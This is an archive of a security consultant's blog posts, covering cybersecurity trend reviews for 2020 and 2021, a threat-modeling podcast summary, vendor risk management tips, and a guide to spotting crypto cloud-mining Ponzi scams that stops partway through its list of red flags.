Category Archives: CISO

Five Cyber-Tech Trends of 2021 and What it Means for 2022.

Minneapolis 01/08/22

By Jeremy Swenson

Intro:

Every year I like to research and commentate on the most impactful security technology and business happenings from the prior year. This year is unique since the pandemic and mass resignation/gig economy continues to be a large part of the catalyst for most of these trends. All these trends are likely to significantly impact small businesses, government, education, high tech, and large enterprise in big and small ways.

Fig. 1. Facebook Whistle Blower and Disinformation Mashup (Getty & Stock Mashup, 2021).

Summary:

The pandemic continues to be a big part of the catalyst for digital transformation in tech automation, identity and access management (IAM), big data, collaboration tools, artificial intelligence (AI), and increasingly the supply chain. Disinformation efforts morphed and grew last year challenging data and culture. This requires us to put more attention on knowing and monitoring our own social media baselines. We no longer have the same office due to mass work from home (WFH) and the mass resignation/gig economy. This infers increased automated zero-trust policies and tools for IAM with less physical badge access required. The security perimeter is now more defined by data analytics than physical/digital boundaries.

The importance of supply chain cyber security was elevated by the Biden Administration’s Executive Order 1407 in response to hacks including SolarWinds and Colonial Pipeline. Education and awareness around the review and removal of non-essential mobile apps grows as a top priority as mobile apps multiply. All the while, data breaches, and ransomware reach an all-time high while costing more to mitigate.

1) Disinformation Efforts Accelerate Challenging Data and Culture:

Disinformation has not slowed down any in 2021 due to sustained advancements in communications technologies, the growth of large social media networks, and the “appification” of everything thereby increasing the ease and capability of disinformation. Disinformation is defined as incorrect information intended to mislead or disrupt, especially propaganda issued by a government organization to a rival power or the media. For example, governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies, and control public opinion (Shelly Banjo; Bloomberg, 05/18/2019).

Today’s disinformation war is largely digital via platforms like Facebook, Twitter, Instagram, Reddit, WhatsApp, Yelp, Tik-tok, SMS text messages, and many other lesser-known apps. Yet even state-sponsored and private news organizations are increasingly the weapon of choice, creating a false sense of validity. Undeniably, the battlefield is wherever many followers reside. 

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace and stop it. Further complicating this phenomenon is the number of app-to-app permissions. For example, the CNN and Twitter apps having permission to post to Facebook and then Facebook having permission to post to WordPress and then WordPress posting to Reddit, or any combination like this. Not only does this make it hard to identify the chain of custody and original source, but it also weakens privacy and security due to the many authentication permissions involved. The copied data is duplicated at each of these layers which is an additional consideration.

We all know that false news spreads faster than real news most of the time, largely because it is sensationalized. Since most disinformation draws in viewers which drives clicks and ad revenues; it is a money-making machine. If you can significantly control what’s trending in the news and/or social media, it impacts how many people will believe it. This in turn impacts how many people will act on that belief, good or bad. This is exacerbated when combined with human bias or irrational emotion. For example, in late 2021 there were many cases of fake COVID-19 vaccines being offered in response to human fear (FDA; 09/28/2021). This negatively impacts culture by setting a misguided example of what is acceptable.

There were several widely reported cases of political disinformation in 2021 including misleading texts, e-mails, mailers, Facebook censorship, and robocalls designed to confuse American voters amid the already stressful pandemic. Like a narcissist’s triangulation trap, these disinformation bursts riled political opponents on both sides in all states creating miscommunication, ad hominin attacks, and even derailed careers with impacts into the future (PBS; The Hinkley Report, 11/24/20 and Daniel Funke; USA Today, 12/23/21).

Facebook is significantly involved in disinformation as one recent study stated, “Globally, Facebook made the wrong decision for 83 percent of those ads that had not been declared as political by their advertisers and that Facebook or the researchers deemed political. Facebook both overcounted and undercounted political ads in this group” (New York University; Cybersecurity For Democracy, 2021). Of course, Facebook disinformation whistleblower Frances Haugen who testified before Congress in 2021 is only more evidence of these and related Facebook failings. Specifically that “Facebook executives, including CEO Mark Zuckerberg, misstated and omitted key details about what was known about Facebook and Instagram’s ability to cause harm” (Bobby Allyn; NPR, 10/05/21).

Fig. 2. Facebook Gaps in Ad Transparency (IMEC-DistriNet KU Leuven and NYU Cyber Security for Democracy, 2021).

With the help of Facebook’s misinformation, huge swaths of confused voters and activists aligned more with speculation and emotion/hype than unbiased facts, and/or project themselves as fake commentators. This dirtied the data in terms of the election process and only begs the question – which parts of the election information process are broken? This normalizes petty policy fights, emotional reasoning, lack of unbiased intellectualism – negatively impacting western culture. All to the threat actor’s delight. Increased public to private partnerships, more educational rigor, and enhanced privacy protections for election and voter data are needed to combat this disinformation.

2) Identity and Access Management (IAM) Scrutiny Drives Zero Trust Orchestration:

The pandemic and mass resignation/gig economy has pushed most organizations to amass work from home (WFH) posture. Generally, this improves productivity making it likely to become the new norm. Albeit with new rules and controls. To support this, 51% of business leaders started speeding up the deployment of zero trust capabilities in 2020 (Andrew Conway; Microsoft, 08/19/20) and there is no evidence to suggest this is slowing down in the next year but rather it is likely increasing to support zero trust orchestration. Orchestration is enhanced automation between partner zero trust applications and data, while leaving next to no blind spots. This reduces risk and increases visibility and infrastructure control in an agile way. The quantified benefit of deploying mature zero trust capabilities including orchestration is on average $ 1.76 million dollars less in breach response costs when compared to an organization who has not rolled out zero trust capabilities (IBM Security, Cost of A Data Breach Report, 2021). 

Fig. 3. Zero Trust Components to Orchestration (Microsoft, 09/17/21).

Zero trust moves organizations to a need-to-know-only access mindset with inherent deny rules, all the while assuming you are compromised. This infers single sign-on at the personal device level and improved multifactor authentication. It also infers better role-based access controls (RBAC), firewalled networks, improved need-to-know policies, effective whitelisting and blacking listing of apps, group membership reviews, and state of the art PAM (privileged access management) tools for the next year. In the future more of this is likely to better automate and orchestrate (Fig. 3.) zero trust abilities so that one part does not hinder another part via complexity fog.

3) Security Perimeter is Now More Defined by Data Analytics than Physical/Digital Boundaries:

This increased WFH posture blurs the security perimeter physically and digitally. New IP addresses, internet volume, routing, geolocation, and virtual machines (VMs) exacerbate this blur. This raises the criticality of good data analytics and dashboarding to define the digital boundaries in real-time. Therefore, prior audits, security controls, and policies may be ineffective. For instance, empty corporate offices are the physical byproduct of mass WFH, requiring organizations to set default disable for badge access. Extra security in or near server rooms is also required. The pandemic has also made vendor interactions more digital, so digital vendor connection points should be reduced and monitored in real-time, and the related exception policies should be re-evaluated.

New data lakes and machine learning informed patterns can better define security perimeter baselines. One example of this includes knowing what percent of your remote workforce is on what internet providers and what type? For example, Google fiber, Comcast cable, CenturyLink DSL, ATT 5G, etc. There are only certain modems that can go with each of these networks and that leaves a data trail. Of course, it could be any type of router. What type of device do they connect with MAC, Apple, VM, or other, and if it is healthy can all be determined in relationship to security perimeter analytics.

4) Supply Chain Risk and Attacks Increase Prompting Government Action:

Every organization has a supply chain big or small. There are even subcomponents of the supply chain that can be hard to see like third/fourth-party vendors. A supply chain attack works by targeting a third/fourth party with access to an organization’s systems instead of hacking their networks directly.

In 2021 cybercriminals focused their surveillance on key components of the supply chain including hacking DNS servers, switches, routers, VPN concentrators and services, and other supply chain connected components at the vendor level. Of note was the massive Colonial Gas Pipeline hack that spiked fuel prices this last summer. This was caused by one compromised VPN account informed by a leaked password from the dark web (Turton, William; and Mehrotra, Kartikay; Bloomberg, 06/04/21). The SolarWinds hack was another supply chain-originated attack in that they got into SolarWinds IT management product Orien which in turn got them into the networks of most of the customers of that product (Lily Hay Newman; Wired, 12/19/21). The research consensus unsurprisingly ties this attack to Russian affiliated threat actors and there is no evidence contracting that.

In response to these and related attacks the U.S. Presidential Administration issued Executive Order 14017, the heart of which requires those who manufacture and distribute software a new awareness of their supply chain to include what is in their products, even open-source software (White House; 05/12/21). This in addition to more spending on CISA hiring and public relations efforts for vulnerabilities and NIST framework conformance. Time will tell what this order delivers as it is dependent on what private sector players do.

Fig. 4. Supply Chain Cyber Attack Diagram (INSURETrust, 2021).

5) Data Breaches Have Greatly Increased in Number and Cost:

The pandemic has continued to be a part of the catalyst for increased lawlessness including fraud, ransomware, data theft, and other types of profitable hacking. Cybercriminals are more aggressively taking advantage of geopolitical conflict and legal standing gaps. For example, almost all hacking operations are in countries that do not have friendly geopolitical relations with the United States or its allies – and all their many proxy hops would stay consistent with this. These proxy hops are how they hide their true location and identity.

Moreover, with local police departments extremely overworked and understaffed with their number one priority being responding to the huge uptick in violent crime in most major cities, white-collar cybercrimes remain a low priority. Additionally, local police departments have few cyber response capabilities depending on the size of their precinct. Often, they must sheepishly defer to the FBI, CISA, and the Secret Service, or their delegates for help. Yet not unsurprisingly, there is a backlog for that as well with preference going to large companies of national concern that fall clearly into one of the 16 critical infrastructures. That is if turf fights and bureaucratic roadblocks don’t make things worse. Thus, many mid and small-sized businesses are left in the cold to fend for themselves which often results in them paying ransomware, and then being a victim a second time all the while their insurance carrier drops them.

Further complicating this is lack of clarity on data breach and business interruption insurance coverage and terms. Keep in mind most general business liability insurance policies and terms were drafted before hacking was invented so they are by default behind the technology. Most often general liability business insurance covers bodily injuries and property damage resulting from your products, services, or operations. Please see my related article 10 Things IT Executives Must Know About Cyber Insurance to understand incident response and to reduce the risk of inadequate coverage and/or claims denials.

According to the Identity Theft Resource Center (ITRC)’s 2021Q3 Data Breach Report, there was a 17% year-over increase as of 09/30/21. This means that by the time they finish their Q4 2021 report it’s likely to be above a 30% year-over-year increase. Breaches are also more costly for organizations suffering them according to the IBM Security Cost of Data Breach Report (Fig 5).

Fig 5. Cost of A Data Breach Increases 2020 to 2021 (IBM Security, 2021).

From 2020 to 2021 the average cost of a data breach in U.S. dollars rose to $4.24 million from $3.86 million. This is almost a 10% increase at 9.1%. In contrast, the preceding 4 years were relatively flat (Fig 5). The pandemic and policing conundrum is a considerable part of this uptick.

Lastly, this is a lot of money for an organization to spend on a breach. Yet this amount could be higher when you factor in other long-term consequence costs such as increased risk of a second breach, brand damage, and/or delayed regulatory penalties that were below the surface – all of which differs by industry. In sum, it is cheaper and more risk prudent to spend even $4.24 million or a relative percentage at your organization on preventative zero trust capabilities than to deal with the cluster of a data breach.

Take-Aways:

COVID-19 remains a catalyst for digital transformation in tech automation, IAM, big data, collaboration tools, and AI. We no longer have the same office and thus less badge access is needed. The growth and acceptability of mass WFH combined with the mass resignation/gig economy remind employers that great pay and culture alone are not enough to keep top talent. Signing bonuses and personalized treatment are likely needed. Single sign-on (SSO) will expand to personal devices and smartphones/watches. Geolocation-based authentication is here to stay with double biometrics likely. The security perimeter is now more defined by data analytics than physical/digital boundaries, and we should dashboard this with machine learning and AI tools.

Education and awareness around the review and removal of non-essential mobile apps is a top priority. Especially for mobile devices used separately or jointly for work purposes. This requires a better understanding of geolocation, QR code scanning, couponing, digital signage, in-text ads, micropayments, Bluetooth, geofencing, e-readers, HTML5, etc. A bring your own device (BYOD) policy needs to be written, followed, and updated often informed by need-to-know and role-based access (RBAC) principles. Organizations should consider forming a mobile ecosystem security committee to make sure this unique risk is not overlooked or overly merged with traditional web/IT risk. Mapping the mobile ecosystem components in detail is a must.

IT and security professionals need to realize that alleviating disinformation is about security before politics. We should not be afraid to talk about it because if we are then our organizations will stay weak and insecure and we will be plied by the same political bias that we fear confronting. As security professionals, we are patriots and defenders of wherever we live and work. We need to know what our social media baseline is across platforms. More social media training is needed as many security professionals still think it is mostly an external marketing thing. Public-to-private partnerships need to improve and app to app permissions need to be scrutinized. Enhanced privacy protections for election and voter data are needed. Everyone does not need to be a journalist, but everyone can have the common sense to identify malware-inspired fake news. We must report undue bias in big tech from an IT, compliance, media, and a security perspective.

Cloud infra will continue to grow fast creating perimeter and compliance complexity/fog. Organizations should preconfigure cloud-scale options and spend more on cloud-trained staff. They should also make sure that they are selecting more than two or three cloud providers, all separate from one another. This helps staff get cross-trained on different cloud platforms and add-ons. It also mitigates risk and makes vendors bid more competitively. 

The increase in number and cost of data breaches was in part attributed to vulnerabilities in supply chains in a few national data breach incidents in 2021. Part of this was addressed in President Biden’s Executive Order 1407 on supply chain security. This reminds us to replace outdated routers, switches, repeaters, controllers, and to patch them immediately. It also reminds us to separate and limit network vendor access points to strictly what is needed and for a limited time window. Last but not least, we must have up-to-date thorough business interruption / cyber insurance with detailed knowledge of what it requires for incident response with breach vendors pre-selected.  

About the Author:

Jeremy Swenson is a disruptive thinking security entrepreneur, futurist/researcher, and senior management tech risk consultant. Over 17 years he has held progressive roles at many banks, insurance companies, retailers, healthcare orgs, and even governments including being a member of the Federal Reserve Secure Payment Task Force. Organizations relish in his ability to bridge gaps and flesh out hidden risk management solutions while at the same time improving processes. He is a frequent speaker, published writer, podcaster, and even does some pro bono consulting in these areas. As a futurist, his writings on digital currency, the Target data breach, and Google combing Google + video chat with Google Hangouts video chat have been validated by many. He holds an MBA from St. Mary’s University of MN, a MSST (Master of Science in Security Technologies) degree from the University of Minnesota, and a BA in political science from the University of Wisconsin Eau Claire.

Seven Impactful Cyber-Tech Trends of 2020 and What it Means for 2021.

Every year I like to research and commentate on the most impactful security technology and business happenings from the prior year. This year is unique since the pandemic is partly the catalyst for most of these trends in conjunction with it being a presidential election year like no other. All these trends are likely to significantly impact small businesses, government, education, high tech, and large enterprise in big and small ways.

Fig 1. Stock Mashup, 2020.

1) Disinformation Efforts Accelerate Challenging Data and Culture:

Advancements in communications technologies, the growth of large social media networks, and the “appification” of everything increases the ease and capability of disinformation. Disinformation is defined as incorrect information intended to mislead or disrupt, especially propaganda issued by a government organization to a rival power or the media. For example, governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies, and control public opinion (Shelly Banjo, Bloomberg, 05/18/2019). Today’s disinformation war is largely digital via platforms like Facebook, Twitter, iTunes, WhatsApp, Yelp, and Instagram. Yet even state-sponsored and private news organizations are increasingly the weapon of choice creating a false sense of validity. Undeniably, the battlefield is wherever many followers reside. 

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace it and to stop it. Further complicating this phenomenon is the number of app-to-app permissions. For example, the CNN and Twitter apps having permission to post to Facebook and then Facebook having permission to post to WordPress and then WordPress posting on Reddit, or any combination like this. Not only does this make it hard to identify the chain of custody and source, but it also weakens privacy and security due to the many authentication permissions. 

We all know that false news spreads faster than real news most of the time, largely because it is sensationalized. Since disinformation draws in viewers, which drives clicks and ad revenues – it is a money-making machine. If you can control what’s trending in the news and/or social media, it impacts how many people will believe it. This in turn impacts how many people will act on that belief, good or bad. This is exacerbated when combined with human bias or irrational emotion. For example, in late 2020 there were many cases of fake COVID-19 vaccines being offered in response to human fear (FDA, 12/22/2020). This negatively impacts culture by setting a misguided example of what is acceptable.

There were several widely reported cases of political disinformation in 2020 including misleading texts, e-mails, mailers, and robocalls designed to confuse American voters amid the already stressful pandemic. Like a narcissist’s triangulation trap these disinformation bursts riled political opponents on both sides in all states creating miscommunication, ad hominin attacks, and even derailed careers (PBS, The Hinkley Report, 11/24/20). Moreover, huge swaths of confused voters aligned more with speculation and emotion/hype than unbiased facts. This dirtied the data in terms of the election process and only begs the question of which parts of the election information process are broken. This normalizes petty policy fights, emotional reasoning, lack of unbiased intellectualism – negatively impacting western culture. All to the threat actor’s delight. Increased public to private partnerships, more educational rigor, and enhanced privacy protections for election and voter data are needed to combat this disinformation.

2) Stalkerware Grows and Evolves Reducing Mobile Privacy:

The increased use of mobile devices in conjunction with the pandemic induced work from home (WFH) growth has produced more stalkerware. According to one report, there was a 51% increase in Android spyware and stalkerware from March through June, vs the first two months of the year (Avast, Security Boulevard, 12/02/20); and this is likely to be above a 100% increase when all data is tabulated for the end of 2020. Inspired by covert law enforcement investigation tactics, this malware variant can be secretly installed on a victim’s phone hiding as a seemingly harmless app. It is not that different from employee monitoring software. However, unlike employee monitoring software, which can easily be confused with this malware; stalkerware is typically installed by fake friends, jealous spouses and partners, ex-partners, and even concerned relatives. If successfully installed, it relays private information back to the attacker including the victim’s photos, location, texts, web browsing history, call records and more. This is where the privacy violation and abuse and/or fraud can start yet it is hard to identify in the blur of too many mobile apps.

3) Identity & Access Management (IAM) Scrutiny Drives Zero Trust:

The pandemic has pushed most organizations to amass WFH posture. Generally, this improves productivity making it likely to become the new norm, albeit with new rules and controls. To support this, 51% of business leaders are speeding up the deployment of Zero Trust capabilities (Andrew Conway, Microsoft, 08/19/20). Zero trust moves organizations to a need to know only access mindset with inherent deny rules, all the while assuming you are compromised. This infers single sign-on at the personal device level and improved multifactor authentication. It also infers better role-based access controls (RBAC), improved need to know policies, group membership reviews, and state of the art PAM tools for the next year.

4) Security Perimeter is Now More Defined by Data Analytics than Physical/Digital Boundaries:

This increased WFH posture blurs the security perimeter both physically and digitally. New IP addresses, internet volume, routing, geolocation, and virtual machines (VMs) exacerbate this blur. This raises the criticality of good data analytics and dashboarding to define the digital boundaries in real-time. Therefore, prior audits, security controls, and policies may be ineffective. For instance, empty corporate offices are the physical byproduct of mass WFH, requiring organizations to set default disable for badge access. Extra security in or near server rooms is also required. The pandemic has also made vendor interactions more digital, so digital vendor connection points should be reduced and monitored in real-time, and the related exception policies should be revaluated.

5) Data Governance Gets Sloppy Amid Agility:

Mass WFH has increased agility and driven sloppy data governance. For example, one week after the CARES Act was passed banks were asked to accept Paycheck Protection Program (PPP) loan applications. Many banks were unprepared to deal with the flood of data from digital applications, financial histories, and related docs, and were not able to process them in an efficient way. Moreover, the easing of regulatory red tape at hospitals/clinics, although well-intentioned to make emergency response faster. It created sloppy data governance, as well. The irony of this is that regulators are unlikely to give either of these industries a break, nor will civil attorneys hungry for any hangnail claim.

6) The Divide Between Good and Bad Cloud Security Grows:

The pandemic has reminded us that there are two camps with cloud security. Those who have a planned option for bigger cloud-scale and those that are burning their feet in a hasty rush to get there. In the first option, the infrastructure is preconfigured and hardened, rates are locked, and there is less complexity, all of which improves compliance and gives tech risk leaders more peace of mind. In the latter, the infrastructure is less clear, rates are not predetermined, compliance and integration are confusing at best, and costs run high – all of which could set such poorly configured cloud infrastructures up for future disasters.

7) Phishing Attacks Grow Exponentially and Get Craftier:

The pandemic has caused a hurricane of phishing emails that have been hard to keep up with. According to KnowBe4 and Security Magazine, there has been a 6,000% increase in phishing e-mails since the start of the pandemic (Stu Sjouwerman, KnowBe4, 07/13/20 & Security Magazine, 07/22/20). Many of these e-mails have improved their approach and design, appearing more professional and appealing to our emotions by using tags concerning COVID relief, data, and vaccines. Ransomware increased 72% year over year (Security Magazine, 07/22/20). With many new complexities in the mobile ecosystem and exponential app growth, it is not surprising that mobile vulnerabilities also increased by 50% (Security Magazine, 07/22/20).

Take-Aways:

COVID-19 is the catalyst for digital transformation in tech automation, IAM, big data, collaboration tools, and AI. We no longer have the same office and thus less badge access is needed. Single sign-on (SSO) will expand to personal devices and smartphones/watches. Geolocation based authentication is here to stay with double biometrics likely. The security perimeter is now more defined by data analytics than physical/digital boundaries, and we should to dashboard this with machine learning and AI tools.

Education and awareness around the review and removal of non-essential mobile apps is a top priority. Especially for mobile devices used separately or jointly for work purposes. This requires a better understanding of geolocation, QR code scanning, couponing, digital signage, in-text ads, micropayments, Bluetooth, geofencing, e-readers, HTML5, etc. A bring your own device (BYOD) policy needs to be written, followed and updated often – embracing need to know and role-based access (RBAC) principles. Organizations should consider forming a mobile ecosystem security committee to make sure this unique risk is not overlooked or overly merged with traditional web/IT risk. Mapping the mobile ecosystem components in detail is a must.

Cloud infra will continue to grow fast creating perimeter and compliance complexity/fog. Organizations should preconfigure cloud scale options and spend more on cloud trained staff. They should also make sure that they are selecting more than two or three cloud providers, all separate from one another. This helps staff get cross-trained on different cloud platforms and add-ons. It also mitigates risk and makes vendors bid more competitively.  IT and security professionals need to realize that alleviating disinformation is about security before politics. We should not be afraid to talk about it because if we are then our organizations will stay weak and insecure and we will be plied by the same political bias that we fear confronting. As security professionals, we are patriots and defenders of wherever we live and work. We need to know what our social media baseline is across platforms. More social media training is needed as many security professionals still think it is mostly an external marketing thing. Public-to-private partnerships need to improve and app to app permissions need to be scrutinized. Enhanced privacy protections for election and voter data are needed. Everyone does not need to be a journalist, but everyone can have the common sense to identify malware inspired fake news. We must report undue bias in big tech from an IT, compliance, media, and a security perspective.

About the Author:

Jeremy Swenson is a disruptive thinking security entrepreneur and senior management tech risk consultant. Over 15 years he has held progressive roles at many banks, insurance companies, retailers, healthcare orgs, and even governments. Organizations relish in his ability to bridge gaps and flesh out hidden risk management solutions while at the same time improving processes. He is also a frequent speaker, published writer, and even does some pro bono consulting in these areas. He holds an MBA from St Mary’s University of MN and MSST (Master of Science in Security Technologies) degree from the University of Minnesota.

Abstract Forward Podcast #10: CISO Risk Management and Threat Modeling Best Practices with Donald Malloy and Nathaniel Engelsen!

Fig. 1. Joe the IT Guy, 10/17/2018

Featuring the esteemed technology and risk thought leaders Donald Malloy and Nathaniel Engelsen — this episode covers threat modeling methodologies STRIDE, Attack Tree, VAST, and PASTA. Specifically, how to apply them with limited budgets. It also discusses the complex intersection of how to derive ROI on threat modeling with compliance and insurance considerations. We then cover IAM best practices including group and role level policy and control best practices. Lastly, we hear a few great examples of key CISO risk management must-dos at the big and small company levels.

Fig. 2. Pasta Threat Modeling Steps (Nataliya Shevchenko, CMU, 12/03/2018).

Donald Malloy has more than 25 years of experience in the security and payment industry and is currently a security technology consultant advising many companies. Malloy was responsible for developing the online authentication product line while at NagraID Security (Oberthur) and prior to that he was Business Development and Marketing Manager for Secure Smart Card ICs for both Philips Semiconductors (NXP) and Infineon Technologies. Malloy originally comes from Boston where he was educated and has M.S. level degrees in Organic Chemistry and an M.B.A. in Marketing. Presently he is the Chairman of The Initiative for Open Authentication (OATH) and is a solution provider with DualAuth. OATH is an industry alliance that has changed the authentication market from proprietary systems to an open-source standard-based architecture promoting ubiquitous strong authentication used by most companies today. DualAuth is a global leader in trusted security with two-factor authentication include auto passwords. He resides in southern California and in his spare time he enjoys hiking, kayaking, and traveling around this beautiful world.

Nathaniel Engelsen is a technology executive, agilest, writer, and speaker on topics including DevOps, agile team transformation, and cloud infrastructure & security. Over the past 20 years he has worked for startups, small and mid-size organizations, and $1B+ enterprises in industries as varied as consulting, gaming, healthcare, retail, transportation logistics, and digital marketing. Nathaniel’s current security venture is Callback Security, providing dynamic access control mechanisms that allow companies to turn off well-known or static remote and database access routes. Nathaniel has a bachelor’s in Management Information Systems from Rowan University and an MBA from the University of Minnesota, where he was a Carlson Scholar. He also holds a CISSP.

The podcast can be heard here.

More information on Abstract Forward Consulting can be found here.

Disclaimer: This podcast does not represent the views of former or current employers and/or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason-based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

8 Effective Third-Party Risk Management Tactics

In this increasingly complex security landscape with threat actors and vendors changing their tools rapidly, managing third-party risk is very difficult, ambiguous, and it’s even more difficult to know how to prioritize mitigation spend.

Fig 1. Risk, Stock Image, 2019.

The key to any vendor risk management program or framework is measurement, repeatability, and learning or improving from what was repeated as the business and risks change. These are the nine best practices you can follow to help assess your vendors’ security processes and their willingness to understand your risks and collectively mitigate both of them.

1) Identify All Your Vendors / Business Associates:

Many companies miss this easy step. Use RBAC (role-based access controls) when applicable – windows groups or the like. Creating a repeatable, written, compliance process for identifying them and making updates to the list as vendors move in and out of the company is worthwhile.

2) Ensure Your Vendors Perform Regular Security Assessments:

Risk assessments should be conducted on a weekly, monthly, or quarterly basis and reviewed and updated in response to changes in technology and the operating environment.

At a minimum, security risk assessments should include:

a) Evaluate the likelihood and potential impact of risks to in-scope assets.

b) Institute measures to protect against those risks.

c) Documentation of the security measures taken.

Vendors must also regularly review the findings of risk assessments to determine the likelihood and impact of the risk that they identify, as well as remediate any deficiencies.|

Fig. 2. Stock Image, Third-Party Risk Mgmt Inputs, 2019.

3) Make Sure Vendors Have Written Information Security Policies / Procedures:

a) Written security policies and procedures should clearly outline the steps and tasks needed to ensure compliance delivers the expected outcomes.

b) Without a reference point, policies and procedures can become open to individual interpretation, leading to misalignment and mistakes. Verify not only that companies have these written policies, but that they align with your organization’s standards. Ask other peers in your industry for a benchmark.

 4) Prioritize Vendors Based on Risk – Use Evidence and Input from Others – NOT Speculation:

a) Critical Risk: Vendors who are critical to your operation, and whose failure or inability to deliver contracted services could result in your organization’s failure.

b) High Risk: Vendors (1) who have access to customer data and have a high risk of information loss; and / or (2) upon whom your organization is highly dependent operationally.

c) Medium Risk: Vendors (1) whose access to customer information is limited; and / or whose loss of services would be disruptive to your organization.

d) Low Risk: Vendors who do not have access to customer data and whose loss of services would not be disruptive to your organization.

5) Verify That Vendors Encrypt Data in All Applicable Places – At Rest, In Transit, etc:

a) Encryption, a process that protects data by making it unreadable without the use of a key or password, is one of the easiest methods of protecting data against theft.

b) When a vendor tells you their data is encrypted, trust but verify. Delve deeper and ask for details about different in-transit scenarios, such as encryption of backup and what type of backup. Ask them about what type of encryption it is and get an infographic. Most people get lost when you ask this question.

c) It’s also imperative that the keys used to encrypt the data are very well-protected. Understanding how encryption keys are protected is as vital as encryption itself. Are they stored on the same server? Is multi-factor authentication needed to get access to them? Is there a time limit on how long they can have access to the key?

6) Ensure Vendors Have A Disaster Recovery Program:

In order to be compliant with the HIPAA Security Rule and related rules, vendors must have a detailed disaster recovery program that includes analysis on how a natural disaster—fire, flood or even a rodent chewing through cables—could affect systems containing ePHI. The plan should also include policies and procedures for operating after a disaster, delineating employees’ roles and responsibilities. Finally, the plan should clearly outline the plan for restoring the data.

7) Ensure Access Is Based on Legitimate Business Needs:

Fig 3. Stock Image, RBAC Flow, 2019.

It’s best to follow the principle of least privilege (POLP), which is the practice of limiting access rights for users to the bare minimum permissions they need to perform their work. Under POLP, users are granted permission to read, write, or execute only the files or resources they need to do their jobs. In other words, the least amount of privilege necessary. RBAC is worth mentioning here again.

8) Vet All New Vendors with Due Diligence:

a) Getting references.

b) Using a standard checklist.

c) Performing a risk analysis and determining if the vendor will be ranked Critical, High, Medium or Low.

d) Document and report to senior management.

Contact us here to learn more.

Eight Tips to Detect Crypto Mining Scams

Whether it’s Power Mining Pool today or Bitconnect yesterday, the crypto space is festering with parasitic scams and opportunistic swindlers. The conditions are ripe for them and there’s money to be made.

Fig. 1. BTCProMiner Free Scam research, 2018.
BTCProminer.png

Among the dangers, Bitcoin mining scams are a tough one to identify and parting the good from the nasty can be tricky. Mining scams are wrapped up in an already technically demanding task of Bitcoin mining. They are billed as a consumer-friendly method for building exposure to Bitcoin mining, and when run like this, they really do provide value for investors looking to diversify.

Legit Bitcoin cloud mining pools are too often buried in search results and outranked by throngs of fly-by-night operations. Finding the legit pools can be a tall order and require sifting through Reddit posts and Bitcointalk forum entries. With that said, there are legit mining operations out there. As always, do your own research and stay skeptical as we settle and develop this wild frontier. For now, let’s take a look at what a crypto mining scam looks like to hopefully better prepare us to identify the key red flags.

What’s a Cloud Mining Pool?

A cloud mining pool is the most hands-off version of crypto mining you can get. They allow a participant to rent or lease hashing power not directly owned by themselves. The rented hashing power is then pooled and paid out proportionally to the members (after fees and operational costs).

A traditional mining pool instead requires participants to supply their own hashing power and pool it with other miners. The participant owns and operates their own hardware and contributes to the pool’s overall hashing power. The critical difference between a cloud mining pool and a traditional mining pool is the ownership of the hardware.

Cloud mining: you don’t own the hardware (hashing power).
Traditional mining: you own hardware (hashing power).

Why pool at all? In short, block rewards become more difficult to obtain as overall hashing power of a particular blockchain increase. Take Bitcoin as an example. There was a time in Bitcoin mining when a standard CPU could mine whole blocks itself. Gone are those days. Bitcoin mining is now big business with plenty of stakeholders leveraging their resources into the security of the blockchain. Miners with serious hashing power make it improbable for small miners to reasonably expect block rewards. Their hashing power is just not enough to compete.

The solution: gather together all these smaller players and pool their hashing power. Miners in a pool no longer compete for blocks of their own, instead, they work together and proportionally share the booty.

What’s a Ponzi Scheme?

It’s theft, let’s just clear that up. If you’re in a Ponzi scheme you are either being robbed or doing the robbing yourself. A typical Ponzi scheme involves enticing participants to invest their money into a fund or investment strategy that has seemingly guaranteed returns. In reality, and with variation, the returns are not gained by real-world trading or superior business acumen. Conversely, new investments to the funds are distributed around existing investors and represented as market returns.

Fig 2. General Ponzi Scheme Principles, 2018.
bitcoin-ponzi-games.jpgPonzi schemes require a constant flow of new investment to keep the machine moving. Once things fall apart or new investment slows, the scheme is often revealed for what it is. In the world of crypto Ponzi schemes, a collapsing Ponzi scheme is followed by a hasty exit scam.

Case in point; “A New York federal court has ordered cryptocurrency hedge fund Gelfman Blueprint, Inc. (GBI) and its CEO Nicholas Gelfman to pay over $2.5 million for operating a fraudulent Ponzi scheme, according to an official announcement published Oct. 18. GBI is a New York-based corporation and denominated Bitcoin (BTC) hedge fund incorporated in 2014. As stated on the company’s website, by 2015 it had 85 customers and 2,367 BTC under management. The order is the continuation of the initial anti-fraud enforcement action filed by the U.S. Commodity Futures Trading Commission (CFTC) against GBI in September 2017. The CFTC charged GBI for allegedly running a Ponzi scheme from 2014 to 2016, telling investors that it had developed a computer algorithm called “Jigsaw” which allowed for substantial returns through a commodity fund. In reality, the entire scheme was a fraud” (, Cointelegraph.com, 10/19/18).

Keep in mind that Ponzi schemes thrive in times of economic expansion and speculative bubbles. Capturing collective optimism is pivotal to its success. Bitconnect is a choice example of the market fervor getting the best of investors.

Identifying the Red Flags of a Cloud Mining Ponzi Scheme

Firstly, the duck test. If it looks like a duck, swims like a duck, and quacks like a duck, then it probably is a duck. The duck test isn’t scientific by any standard but can be used to leverage your gut feeling to identify early warning signs. Ponzi schemes, whether in Wall Street, Main Street or Bitcoin mining pools, all share very common characteristics. If the opportunity you’re looking at is checking off the same boxes that previous Ponzi schemes had, it’s probably a duck.

Let’s take a look at some criteria or common characteristics of Bitcoin cloud mining Ponzi schemes.

**Much appreciation to Puppet on the BitcoinTalk forum for their work on this template to review Bitcoin cloud mining operations. Until this type of vetting is part of the investor process, crowd-sourced community led investigation is paramount.**

Red flags of a cloud mining Ponzi scheme (adapted from Puppet’s Criteria)

  1. No public mining address / Users unable to select own pools
    When you rent hashing power from a cloud miner, you are only renting hashing power. This means that the pool you contribute to should be your own choice. The cloud mining operator you rent from may also have a pool for convenience but should not require you to use it. There is no reason for a mining pool to hide their public mining address, it just doesn’t make sense.
  2. No endorsement from hardware/ASIC provider
